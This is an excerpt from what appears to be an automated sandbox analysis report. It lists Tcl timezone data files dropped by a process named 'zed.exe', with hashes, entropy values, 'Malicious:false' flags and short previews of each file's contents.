                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGurKeTnXHAIgObTurKefVHRL/nUDHthA5nUDHurK:SlSWB9vsM3yciemHAIgObiecN/NXevn
                                                                                                                                                                                                                                            MD5:8E335F5D0A2082BB673E7FEB56167A89
                                                                                                                                                                                                                                            SHA1:EF37235922D4477AC9B3D9576888CDE41E700741
                                                                                                                                                                                                                                            SHA-256:98D06302EFC18FAD7751F7E5A059FE4ABAFBC361FDC365FE1EB576209D92C658
                                                                                                                                                                                                                                            SHA-512:2572D99EE8BAF264B8A2EF3D7647D33A387EE83E036F9E7BDB21F64C2FCB43317AF9C899C8CDD822A2A5A207EF17504E71B217370473ED95AE925BBA2CFA90F9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Pago_Pago)]} {.. LoadTimeZoneFile Pacific/Pago_Pago..}..set TZData(:Pacific/Samoa) $TZData(:Pacific/Pago_Pago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):154
                                                                                                                                                                                                                                            Entropy (8bit):4.946903999617555
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHqhFPMXGm2OHl/oeoHsdNqRU7vV:SlSWB9eg/TTPDm2OHloeoH4qRW9
                                                                                                                                                                                                                                            MD5:341B0F535043051A91A21297BFA39DC0
                                                                                                                                                                                                                                            SHA1:6AD9177FC237503E6D36DE5408790A68D5D36E2C
                                                                                                                                                                                                                                            SHA-256:440A87DDB4F304DCBEAED1B0DE8F6058840E597918B688E0782F584DA03B1BBC
                                                                                                                                                                                                                                            SHA-512:D97D399A0F1B4347F8AE5F15E43A8787697339AB0EFB4E1106C790528FFC529ADC5B44B231D95449D39DB464D84A5DDF7B61E7D190E3E2B0091D1EC204B530A2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Tahiti) {.. {-9223372036854775808 -35896 0 LMT}.. {-1806674504 -36000 0 -10}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):152
                                                                                                                                                                                                                                            Entropy (8bit):4.969953728206455
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/nUDHqQ3fMXGm2OHyyFpoeoHvmciRrWFN0UIoAov:SlSWB9eg/T+Dm2OHyyFGeoHvmbu0YAov
                                                                                                                                                                                                                                            MD5:AA67FBBB6A02F5B30486C54E3A5C11D7
                                                                                                                                                                                                                                            SHA1:C64FD3654A47A0ECDD681B8A4D9B621AC6D97DBE
                                                                                                                                                                                                                                            SHA-256:91AA5DA8D5D1E72B1F561D0AEAB4B07E02EDD4EB95AE8C9F1C503C820460599F
                                                                                                                                                                                                                                            SHA-512:FC170904098011C091622A263CA554CEE952D64888D3573EB324E0A262E1A0C0885C059429F0FFF9219FEB8F1B6B97EC34661DD8DD547124D0C6C0A1C8EE24B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Tarawa) {.. {-9223372036854775808 41524 0 LMT}.. {-2177494324 43200 0 +12}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):451
                                                                                                                                                                                                                                            Entropy (8bit):4.343299747430587
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86PmdHmCdC/V7XZXw8Ut2rbUtGiAUtb4bUtqVy:iemn/VbKeOSy
                                                                                                                                                                                                                                            MD5:87CFDA2399A8126117E5BFC018B06518
                                                                                                                                                                                                                                            SHA1:6291611BCFB34293F9C20BA77170A13C1502C2ED
                                                                                                                                                                                                                                            SHA-256:ECC9D2E7AD7B5E5D6599CF442941595C99C4D69E802A4DDB4DA321898CDDE91D
                                                                                                                                                                                                                                            SHA-512:846FE07FEB82EC5F87FAE137D23074934246DBB7C7EE30F44F6C5373183B5FD2211B58E5CF1AB9A47938D282CA322FBDE80B58054FE6517CDC549992439F19A8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Pacific/Tongatapu) {.. {-9223372036854775808 44352 0 LMT}.. {-767189952 44400 0 +1220}.. {-284041200 46800 0 +13}.. {915102000 46800 0 +13}.. {939214800 50400 1 +13}.. {953384400 46800 0 +13}.. {973342800 50400 1 +13}.. {980596800 46800 0 +13}.. {1004792400 50400 1 +13}.. {1012046400 46800 0 +13}.. {1478350800 50400 1 +13}.. {1484398800 46800 0 +13}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.903352083734246
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/TAOA/4pv:MByMdNXiU5trv
                                                                                                                                                                                                                                            MD5:443F5FFA58C5DB1F02695C5B76DF4F5E
                                                                                                                                                                                                                                            SHA1:115AFE9C3EB36F836E2DF95AF42C43EA5C21C1E6
                                                                                                                                                                                                                                            SHA-256:323A858946A2E8EC67C28176977D646C0A0F6DC8B48F9C4A3F8E7112C9B1B71D
                                                                                                                                                                                                                                            SHA-512:33717F3423CE06D827445FEA85BE8A989712CF8C06C54A17B9610A4DAD50BF64CAE80DE15AB12AB0610CD6B5582A897DD9C543098108543FA3E6273AAD9467DE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Pacific/Truk) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):183
                                                                                                                                                                                                                                            Entropy (8bit):4.771810884789573
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDHpbhpUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/0h9Nn
                                                                                                                                                                                                                                            MD5:992D44D728747D79E1F7EF47E3CB2EF2
                                                                                                                                                                                                                                            SHA1:8F05E8DA2A2A45F04B9B89BB34F0B7833B56A261
                                                                                                                                                                                                                                            SHA-256:B6041BC18B595E38953632ACAD1D25F7394BF7C759A72FCCD81AF637F8016373
                                                                                                                                                                                                                                            SHA-512:C59D360941240C8B11D892A930B6CFE141B1A55007483683AF400B1A0C98EF0BBBE7EF595EF6BA73A6EECB8E3D0658A681CF3203E5E32DE80DD61EDB9C6CBDB0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Wake) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.752883303864462
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqTQGqhyXHAIgObTq0vFvRL/nUDHpEsppUDHqNn:SlSWB9vsM3ycmhSHAIgObmSN/t+9Nn
                                                                                                                                                                                                                                            MD5:862ADA129322E53235ED5099A72FE8EE
                                                                                                                                                                                                                                            SHA1:7DAB7BF451CF0FE483EA512C0C733B090FF22EFF
                                                                                                                                                                                                                                            SHA-256:9601B749413D591D820AFAD431B3C30E577ACAB000EA11EC03DEB36EF0738DC3
                                                                                                                                                                                                                                            SHA-512:D9C94BE2F08220E49A336A5760DBF43FCB889ADA95E29117AE5E237E33E9EE50BD32203D2743346A21354AF3F1ADDA43A2953FB55205B6FA998A6294CC57F063
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Tarawa)]} {.. LoadTimeZoneFile Pacific/Tarawa..}..set TZData(:Pacific/Wallis) $TZData(:Pacific/Tarawa)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):200
                                                                                                                                                                                                                                            Entropy (8bit):4.896778032757086
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3yci/452HAIgObi/4oA6N/eP/4pv:MByMdNXiU5teev
                                                                                                                                                                                                                                            MD5:343CCAC12AEB0DD78FC60405DF938729
                                                                                                                                                                                                                                            SHA1:B7B4DF0178DEEC2BA6F23AF5CD896CF16CEAF224
                                                                                                                                                                                                                                            SHA-256:16CF9FAB116E5E1732B4B601DA919798985A0C15803F0964844C7040894C5DBA
                                                                                                                                                                                                                                            SHA-512:041609C63E95322460A31AC83BCC4F8F90B8D44B2740A5CF7E37F66CCD9F928416D74D313370516D7B1780DF2C9C9A78B7069CE2DA6BFFE88C46FB47CE1A4CB2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Port_Moresby)]} {.. LoadTimeZoneFile Pacific/Port_Moresby..}..set TZData(:Pacific/Yap) $TZData(:Pacific/Port_Moresby)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                                                            Entropy (8bit):4.940195299412468
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVqEGIV5XHAIgoqpEGYvWARL/nSi67x/yQa0EGIy:SlSWB9vsM3ymc4HAIgocVAN/27x6qF
                                                                                                                                                                                                                                            MD5:E6AA2F6A05B57AA9B4AEF8E98552EEB2
                                                                                                                                                                                                                                            SHA1:22470C204152702D8826CA52299E942F572C85ED
                                                                                                                                                                                                                                            SHA-256:C27E1179B55BF0C7DB6F1C334C0C20C4AFA4DBB84DB6F46244B118F7EAB9C76E
                                                                                                                                                                                                                                            SHA-512:B28A264907C32F848D356FB0F5776C2CE819DCB6BC08A5E2DCD4FA455EE1616966E816748079C7A55485BABFFB292D567E6F958168F945889E33A267B0E7EDA9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Warsaw)]} {.. LoadTimeZoneFile Europe/Warsaw..}..set TZData(:Poland) $TZData(:Europe/Warsaw)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):176
                                                                                                                                                                                                                                            Entropy (8bit):4.9353841548970205
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxVxMvLS3vXHAIgoqyMvLL6RL/nM24h8QavMvLBn:SlSWB9vsM3ymvMv2PHAIgovMvH6N/e8i
                                                                                                                                                                                                                                            MD5:7D7BD6E40D3ADCA04754255D69B5CC9D
                                                                                                                                                                                                                                            SHA1:EE32167B450DE7B0F1A15199795AEF9524BE623B
                                                                                                                                                                                                                                            SHA-256:EFD666F3062D52C5D0B4F83B1A206E6840C1EAEC356CD77A0A71C7EDFA78C964
                                                                                                                                                                                                                                            SHA-512:6056AAF078316A89079D19555F0BAEFB4C1CDBAA5426A8BEE76E0BFA5C69A5DAAFD199DEF978ABD67287AE1B80F754B7845EAFD5CC0995FE10E44D1F34D5435C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Lisbon)]} {.. LoadTimeZoneFile Europe/Lisbon..}..set TZData(:Portugal) $TZData(:Europe/Lisbon)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):165
                                                                                                                                                                                                                                            Entropy (8bit):4.795776391333205
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qMveyXHAIgNqBLFARL/lOr4WFKfMy:SlSWB9vsM3yKMveSHAIgcBJAN/S4wKfB
                                                                                                                                                                                                                                            MD5:C5AE3A1DAD32C870651C74E367F604CF
                                                                                                                                                                                                                                            SHA1:9FF81383C43D98441841E182BC783381EF565204
                                                                                                                                                                                                                                            SHA-256:9AEC39777013B23D63D0509EBB2F01D57A2C1592264DBB19CE2C61C7D7DDD8DE
                                                                                                                                                                                                                                            SHA-512:3A7217ED885011972262B71DB7F5D7E4C9C6E82B4BEEF0718BCB9452E49FDBDD5ED78564156577AB09150140B862E1944B4B739BCE0C50E63667050C35329503
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Taipei)]} {.. LoadTimeZoneFile Asia/Taipei..}..set TZData(:ROC) $TZData(:Asia/Taipei)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                                                                            Entropy (8bit):4.900717350092823
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8ZQckovXHAIgNtvQMHRL/lmFeWFKKQ7:SlSWB9vsM3yJJHAIgbHN/pwKv
                                                                                                                                                                                                                                            MD5:59E4C80F97FAFC92987B08BFA03B5EE5
                                                                                                                                                                                                                                            SHA1:4F86FCE17A51C3789DEB887BE01A1A0E6EA3D2DE
                                                                                                                                                                                                                                            SHA-256:63153B40225270ADB7CD248788CA9F18C6DEBAF222B3165BBAB633337592DF44
                                                                                                                                                                                                                                            SHA-512:9FCC0F747096775D0FB8DD252A73E6F47C16BF2D7DB0C3FBDFD206EE57393276FB40F65C1441296AE2AC115CFEE11098474DF3FEF8EE1FABE139427A8991F052
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Seoul)]} {.. LoadTimeZoneFile Asia/Seoul..}..set TZData(:ROK) $TZData(:Asia/Seoul)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.85623787837429
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq801c3vXHAIgNtK1tyHRL/kZ8O5h4WFKf1z:SlSWB9vsM3yUgHAIgWv6N/kth4wKf9
                                                                                                                                                                                                                                            MD5:5EABBAAF3B29B5DFF9E54136F7ABC654
                                                                                                                                                                                                                                            SHA1:44615F03264012D97512F9AB386413DD72BE1090
                                                                                                                                                                                                                                            SHA-256:B9443FB17F0128DDB9F2DF657DC5D2DF176F64C61B0D02B272E5DFB108537678
                                                                                                                                                                                                                                            SHA-512:B930D637A1E69E0847ADDEAB013B2C25BC27EBB9CDF20B9CDDFDAC111E9F26BB5EBC83194E845ACC3E1B9A08C386C94FCC4FDE32292EB558E3F7463832BB38B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Singapore)]} {.. LoadTimeZoneFile Asia/Singapore..}..set TZData(:Singapore) $TZData(:Asia/Singapore)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.996391010176349
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y7p5oeSHAIgppON/kjx+90ppv:JByMYbpwt8+90b
                                                                                                                                                                                                                                            MD5:1AC81E2C60D528A6C5BF2E6867146813
                                                                                                                                                                                                                                            SHA1:73D2D24FE6D56CA34ABF11B9A95DC22F809C5158
                                                                                                                                                                                                                                            SHA-256:978C4E5256057CE7374AD7929605090FC749B55558495BD0112FB0BB743FA9C2
                                                                                                                                                                                                                                            SHA-512:DB2673FB54C1308BBEB298A186F9130FB9090CE33B958C82D62B9BD88EE39BAB9A1BE40645547BA4167FD475892A323CF8EBA16C97F6FDF5693F1BF7A313FE9A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:SystemV/AST4) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.9470542553730255
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx02NEO/vXHAIg202NEqA6RL/kRDwh4IAcGE2NEOyn:SlSNJB9vsM3y7UEOXHAIgpUEqA6N/k+H
                                                                                                                                                                                                                                            MD5:2AB4B896957F26B114A990F69989F3FB
                                                                                                                                                                                                                                            SHA1:8048C99F5EE02C021F311709B30EB28D650D884D
                                                                                                                                                                                                                                            SHA-256:0114C111F5BCD838A28F2E16E01ECB79D8AFC8CBF639A672889ED0D692FC6CDC
                                                                                                                                                                                                                                            SHA-512:353744359CD94B1E8184A8B83F762459C69D3AEEA43DA638C1F4CC34E01E9D86C2EBCF7F7BFD059CB23B64051510D1C4556A49D180F8A92DE8449139194DCDC9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Halifax)]} {.. LoadTimeZoneFile America/Halifax..}..set TZData(:SystemV/AST4ADT) $TZData(:America/Halifax)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                                            Entropy (8bit):4.957831162100758
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx0sAzE5Y5XHAIg20sAzEo5RL/kR/eIAcGEsAzEpv:SlSNJB9vsM3y7hzi2HAIgphznN/kc90q
                                                                                                                                                                                                                                            MD5:3EC0B09EAB848821D48849673B24401C
                                                                                                                                                                                                                                            SHA1:41599CBA78E124A7DA9744D2B4EA8CDC10008E0B
                                                                                                                                                                                                                                            SHA-256:30428B85B37898AD98B65BE5B6A8BD599331D9A1B49605FC6521464228E32F8F
                                                                                                                                                                                                                                            SHA-512:9A3303B3338C01B281A40BB48B93C446ADB92BBDC45371667F09EDA92F9EE2AEC60CE8E98CE15C0112B823799C76AEF14895B15DC997DA506494D75BBE58D662
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Regina)]} {.. LoadTimeZoneFile America/Regina..}..set TZData(:SystemV/CST6) $TZData(:America/Regina)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):192
                                                                                                                                                                                                                                            Entropy (8bit):4.975428048518589
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx096yXHAIg20961yHRL/kRwx/h4IAcGE967:SlSNJB9vsM3y796SHAIgp9616N/kyxpQ
                                                                                                                                                                                                                                            MD5:D85CCC5EFAA1ED549D02F09A38A53C68
                                                                                                                                                                                                                                            SHA1:642ED571E4C6F60A953D42DA4F756F2262E4E709
                                                                                                                                                                                                                                            SHA-256:44BEF7D4660A9A873EB762E3FDC651D31D97893545DE643FA1B2D05991C090A1
                                                                                                                                                                                                                                            SHA-512:3CC6A14A17EA4833958A7D444073D6C2709FD61BF54387E5C362151E9143F795B2432B621080DD53E0FC9BDD7C58F406E046E3D0A2BBA4132D99E7C705E6D645
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Chicago)]} {.. LoadTimeZoneFile America/Chicago..}..set TZData(:SystemV/CST6CDT) $TZData(:America/Chicago)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.928128138328689
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y73G7JHAIgp3GZRN/kkp4903G8:JByMY3G7Kp3GntVp4903G8
                                                                                                                                                                                                                                            MD5:506D15E2F37F501F5A592154142A5296
                                                                                                                                                                                                                                            SHA1:5ACA12E0BA0FFF9734ED978A9C60AAA9D1E05A59
                                                                                                                                                                                                                                            SHA-256:798F92E5DDA65818C887750016D19E6EE9445ADFE0FCB7ACB11281293A09C2C7
                                                                                                                                                                                                                                            SHA-512:2EE08D39461CAD3492BE88B421BA463B4CEB8497F036518794BCF605F477057FEA218A9DFBB6335A28A5120750EA06AED9D2EA84CD0007D34CDE562DCD79CC0C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Indianapolis)]} {.. LoadTimeZoneFile America/Indianapolis..}..set TZData(:SystemV/EST5) $TZData(:America/Indianapolis)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):195
                                                                                                                                                                                                                                            Entropy (8bit):5.113680059406992
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3y71RHAIgp1aAN/krp4901Yn:JByMY4pltw+90q
                                                                                                                                                                                                                                            MD5:AAD8EF3067E97785D4052B80F5C4ACE1
                                                                                                                                                                                                                                            SHA1:3EF0A06FCC41119F4A60A32CED0E5A1E0E8B4300
                                                                                                                                                                                                                                            SHA-256:D159140114A13C69F073CFE9AD0B67D713E8811CBFF773A3D1681FC38EA0E699
                                                                                                                                                                                                                                            SHA-512:A8774ADF6818D85476A6C147A45E55B338F413CD9B61BF9FDB0CB7A335C0CE8F8C6D1970783FEFECC2CE18388DF91304CB295BD4DFD29FB538D74F6A414A441D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/New_York)]} {.. LoadTimeZoneFile America/New_York..}..set TZData(:SystemV/EST5EDT) $TZData(:America/New_York)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):193
                                                                                                                                                                                                                                            Entropy (8bit):4.9733028894475195
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSNJB9vsM3yc6e8SHAIgOb6eKAN/kQmrheo:JByMdniinbtRTo
                                                                                                                                                                                                                                            MD5:458061B3F3C8F06C61B5726393A26BA2
                                                                                                                                                                                                                                            SHA1:E894F5615654D1110C9964B8F6A54C048442D8EB
                                                                                                                                                                                                                                            SHA-256:BF62C8650BBA258000F62F16B0C7CBB66F4FD63F8CFDAF54273BB88A02A6C8D6
                                                                                                                                                                                                                                            SHA-512:6A161A7AE44CBF8CE4C704C94456A5B714AAF2A3FAF30731254C9FE056F9DDF207119D516CC6A4C44AE76EC078F5C59F5EC6DD6701FAA3A36F061AF3953B7C7D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(Pacific/Honolulu)]} {.. LoadTimeZoneFile Pacific/Honolulu..}..set TZData(:SystemV/HST10) $TZData(:Pacific/Honolulu)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.999038624718282
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/kRgFfh4IAcGEuto:SlSNJB9vsM3y7OBHAIgpONYyHN/kch4y
                                                                                                                                                                                                                                            MD5:B06AB4998A57446FC4D5A5B986BCA0A9
                                                                                                                                                                                                                                            SHA1:5E4A28466383CBAB2067B9B6D22882CF6D83C3FB
                                                                                                                                                                                                                                            SHA-256:FEBE49FAE260E5595B6F1B21A0A3458D8A50ACA72F4551BF10C1EDB2758E0304
                                                                                                                                                                                                                                            SHA-512:9E44174C4E348E1B768039585BA6393FD001B606E111092EEC57C75210A1E87BF3C72728321945D584CA60D4C848D88EB8B2F82CB88F38F90224A43FDCFEA9AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by ../tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:SystemV/MST7) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):189
                                                                                                                                                                                                                                            Entropy (8bit):4.956231227702093
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFLLJJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/kRMMFfh4IAcGE6RB:SlSNJB9vsM3y7+SPHAIgp+ON/kD490+B
                                                                                                                                                                                                                                            MD5:5D3C1ADB8AC4EAC9E9A31734CD6884BD
                                                                                                                                                                                                                                            SHA1:535B024EA088B9B192BE4206CBDD56BC5B163762
                                                                                                                                                                                                                                            SHA-256:64556A7B20E425C79375C2A7CCF72B2B5223A7DE4FF4C99A5C039DB3456C63F6
                                                                                                                                                                                                                                            SHA-512:FB799A42880613752AD6010D7B4E97ACCF7F6AE281D9A37057F6423AEF2607B608DB2AC52176F1653D8B2D086223C9658B101E73125F0FF7D6D9E8CD876EEC53
                                                                                                                                                                                                                                            Malicious:false
